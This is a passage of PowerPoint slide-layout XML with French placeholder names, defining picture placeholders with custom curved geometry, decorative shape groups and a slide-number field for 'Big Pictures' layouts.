                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E057F96-AA13-484F-A6D7-BD00A55CFA69}"/>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0" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AB2AE01-44B5-487B-B4DD-88F8EF084AB2}"/>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25" name="Espace réservé pour une image  24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B530FC8F-091E-4FF3-A8FF-231A4E16F7AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8461449" y="1453051"/>
            <a:ext cx="3730550" cy="4814343"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3730550"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4814343"/>
              <a:gd name="connsiteX1" fmla="*/ 3730550 w 3730550"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4814343"/>
              <a:gd name="connsiteX2" fmla="*/ 3730550 w 3730550"/>
              <a:gd name="connsiteY2" fmla="*/ 2864306 h 4814343"/>
              <a:gd name="connsiteX3" fmla="*/ 3721309 w 3730550"/>
              <a:gd name="connsiteY3" fmla="*/ 2864306 h 4814343"/>
              <a:gd name="connsiteX4" fmla="*/ 3721309 w 3730550"/>
              <a:gd name="connsiteY4" fmla="*/ 3030497 h 4814343"/>
              <a:gd name="connsiteX5" fmla="*/ 2583869 w 3730550"/>
              <a:gd name="connsiteY5" fmla="*/ 4701903 h 4814343"/>
              <a:gd name="connsiteX6" fmla="*/ 2459302 w 3730550"/>
              <a:gd name="connsiteY6" fmla="*/ 4744902 h 4814343"/>
              <a:gd name="connsiteX7" fmla="*/ 2432462 w 3730550"/>
              <a:gd name="connsiteY7" fmla="*/ 4753429 h 4814343"/>
              <a:gd name="connsiteX8" fmla="*/ 1971936 w 3730550"/>
              <a:gd name="connsiteY8" fmla="*/ 4814343 h 4814343"/>
              <a:gd name="connsiteX9" fmla="*/ 183310 w 3730550"/>
              <a:gd name="connsiteY9" fmla="*/ 4814343 h 4814343"/>
              <a:gd name="connsiteX10" fmla="*/ 183310 w 3730550"/>
              <a:gd name="connsiteY10" fmla="*/ 4812008 h 4814343"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 3730550"/>
              <a:gd name="connsiteY11" fmla="*/ 4812008 h 4814343"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 3730550"/>
              <a:gd name="connsiteY12" fmla="*/ 2864306 h 4814343"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 3730550"/>
              <a:gd name="connsiteY13" fmla="*/ 2458517 h 481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30550" h="4814343">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3730550" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3730550" y="2864306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721309" y="2864306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721309" y="3030497"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3721309" y="3789915"/>
                  <a:pt x="3249967" y="4439246"/>
                  <a:pt x="2583869" y="4701903"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2459302" y="4744902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2432462" y="4753429"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2285680" y="4793150"/>
                  <a:pt x="2131283" y="4814343"/>
                  <a:pt x="1971936" y="4814343"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="183310" y="4814343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183310" y="4812008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4812008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2864306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2458517"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Groupe 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBBC194-44AD-43BF-A0B4-B82B88439011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD6CA4B-C478-4DF2-B12B-2DAD6B737DFE}"/>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2" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D9815A-345B-469F-9547-BD3A4E1ED915}"/>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3" name="Groupe 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC83CD6-4A92-4D29-BEB4-5F60CDCD558E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13528391-68F9-44C9-B8CF-3D462D37BA78}"/>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6" name="Rectangle 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3075A070-FD3E-4D53-80E7-3AA3FD168263}"/>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334827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 Big Pictures">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Espace réservé pour une image  23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98649849-428F-41F0-A66B-0ADDE5F50366}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8461450" y="3911568"/>
            <a:ext cx="3721309" cy="2355826"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3721309"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX1" fmla="*/ 3721309 w 3721309"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX2" fmla="*/ 3721309 w 3721309"/>
              <a:gd name="connsiteY2" fmla="*/ 571980 h 2355826"/>
              <a:gd name="connsiteX3" fmla="*/ 2583869 w 3721309"/>
              <a:gd name="connsiteY3" fmla="*/ 2243386 h 2355826"/>
              <a:gd name="connsiteX4" fmla="*/ 2459302 w 3721309"/>
              <a:gd name="connsiteY4" fmla="*/ 2286385 h 2355826"/>
              <a:gd name="connsiteX5" fmla="*/ 2432462 w 3721309"/>
              <a:gd name="connsiteY5" fmla="*/ 2294912 h 2355826"/>
              <a:gd name="connsiteX6" fmla="*/ 1971936 w 3721309"/>
              <a:gd name="connsiteY6" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX7" fmla="*/ 183310 w 3721309"/>
              <a:gd name="connsiteY7" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX8" fmla="*/ 183310 w 3721309"/>
              <a:gd name="connsiteY8" fmla="*/ 2353491 h 2355826"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 3721309"/>
              <a:gd name="connsiteY9" fmla="*/ 2353491 h 2355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1309" h="2355826">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3721309" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721309" y="571980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3721309" y="1331398"/>
                  <a:pt x="3249967" y="1980729"/>
                  <a:pt x="2583869" y="2243386"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2459302" y="2286385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2432462" y="2294912"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2285680" y="2334633"/>
                  <a:pt x="2131283" y="2355826"/>
                  <a:pt x="1971936" y="2355826"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="183310" y="2355826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183310" y="2353491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235349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22" name="Espace réservé pour une image  21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB9FC852-9C5E-4584-9891-2BCA7F646668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449404" y="3911568"/>
            <a:ext cx="3904614" cy="2355826"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3904614"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX1" fmla="*/ 3904614 w 3904614"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX2" fmla="*/ 3904614 w 3904614"/>
              <a:gd name="connsiteY2" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3904614"/>
              <a:gd name="connsiteY3" fmla="*/ 2355826 h 2355826"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3904614" h="2355826">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3904614" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3904614" y="2355826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235582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33" name="Espace réservé pour une image  32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB58EAA4-8D9B-463C-A9DF-1B6D30E3B4D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8461453" y="1458414"/>
            <a:ext cx="3721306" cy="2345723"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3721306"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX1" fmla="*/ 3721306 w 3721306"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX2" fmla="*/ 3721306 w 3721306"/>
              <a:gd name="connsiteY2" fmla="*/ 2345723 h 2345723"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3721306"/>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3721306" h="2345723">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3721306" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721306"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26" name="Espace réservé pour une image  25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047D8B65-12D5-4FD0-B104-A4F682250AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449404" y="1458414"/>
            <a:ext cx="3904617" cy="2345723"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3904617"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX1" fmla="*/ 3904617 w 3904617"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX2" fmla="*/ 3904617 w 3904617"/>
              <a:gd name="connsiteY2" fmla="*/ 2345723 h 2345723"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3904617"/>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3904617" h="2345723">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3904617" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3904617"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6" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FB58295-9D50-49E8-A97E-AA8D2F48F8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"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0B76C5E4-5344-4E5F-BDA5-C8C0CD68AD88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Image 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75646A25-9A45-4E83-80EA-3DEBFDAE06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9" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E057F96-AA13-484F-A6D7-BD00A55CFA69}"/>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0" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AB2AE01-44B5-487B-B4DD-88F8EF084AB2}"/>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21" name="Espace réservé pour une image  26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9B987F-53F2-405C-8CB3-8762900BBFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3" y="1458412"/>
            <a:ext cx="4333651" cy="4808981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4333651"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2358506"/>
              <a:gd name="connsiteX1" fmla="*/ 4333651 w 4333651"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2358506"/>
              <a:gd name="connsiteX2" fmla="*/ 4333651 w 4333651"/>
              <a:gd name="connsiteY2" fmla="*/ 2358506 h 2358506"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4333651"/>
              <a:gd name="connsiteY3" fmla="*/ 2358506 h 2358506"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4333651" h="2358506">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4333651" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4333651" y="2358506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235850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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Groupe 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DF08D48-5FAE-426C-9761-C83BA2BCFCB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A74837B-A2AF-422C-895E-2A95E7736E88}"/>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7" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6877301-6948-41C7-9F31-0F15D2FED007}"/>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32" name="Groupe 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89454A2A-129F-40BA-BD54-B136B42C97C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C7F72EE-A08A-4218-BE73-1AC6ED29BDD2}"/>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5" name="Rectangle 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7283CA0-3B23-4F5E-9208-FFBBB80D5181}"/>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100590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6 Big Pictures">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Espace réservé pour une image  58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E498DFE4-F7AF-4565-9CCE-B03F6FD0B904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8461450" y="3911568"/>
            <a:ext cx="3721309" cy="2355826"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3721309"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX1" fmla="*/ 3721309 w 3721309"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX2" fmla="*/ 3721309 w 3721309"/>
              <a:gd name="connsiteY2" fmla="*/ 571980 h 2355826"/>
              <a:gd name="connsiteX3" fmla="*/ 2583869 w 3721309"/>
              <a:gd name="connsiteY3" fmla="*/ 2243386 h 2355826"/>
              <a:gd name="connsiteX4" fmla="*/ 2459302 w 3721309"/>
              <a:gd name="connsiteY4" fmla="*/ 2286385 h 2355826"/>
              <a:gd name="connsiteX5" fmla="*/ 2432462 w 3721309"/>
              <a:gd name="connsiteY5" fmla="*/ 2294912 h 2355826"/>
              <a:gd name="connsiteX6" fmla="*/ 1971936 w 3721309"/>
              <a:gd name="connsiteY6" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX7" fmla="*/ 183310 w 3721309"/>
              <a:gd name="connsiteY7" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX8" fmla="*/ 183310 w 3721309"/>
              <a:gd name="connsiteY8" fmla="*/ 2353491 h 2355826"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 3721309"/>
              <a:gd name="connsiteY9" fmla="*/ 2353491 h 2355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21309" h="2355826">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3721309" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721309" y="571980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3721309" y="1331398"/>
                  <a:pt x="3249967" y="1980729"/>
                  <a:pt x="2583869" y="2243386"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2459302" y="2286385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2432462" y="2294912"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2285680" y="2334633"/>
                  <a:pt x="2131283" y="2355826"/>
                  <a:pt x="1971936" y="2355826"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="183310" y="2355826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183310" y="2353491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235349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7" name="Espace réservé pour une image  56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD8FB094-B185-4703-89EB-CF49BE70BC40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449406" y="3911568"/>
            <a:ext cx="3904613" cy="2355826"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3904613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX1" fmla="*/ 3904613 w 3904613"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX2" fmla="*/ 3904613 w 3904613"/>
              <a:gd name="connsiteY2" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3904613"/>
              <a:gd name="connsiteY3" fmla="*/ 2355826 h 2355826"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3904613" h="2355826">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3904613" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3904613" y="2355826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235582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5" name="Espace réservé pour une image  54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF97C46F-6B29-41F7-A0F0-90222B017889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
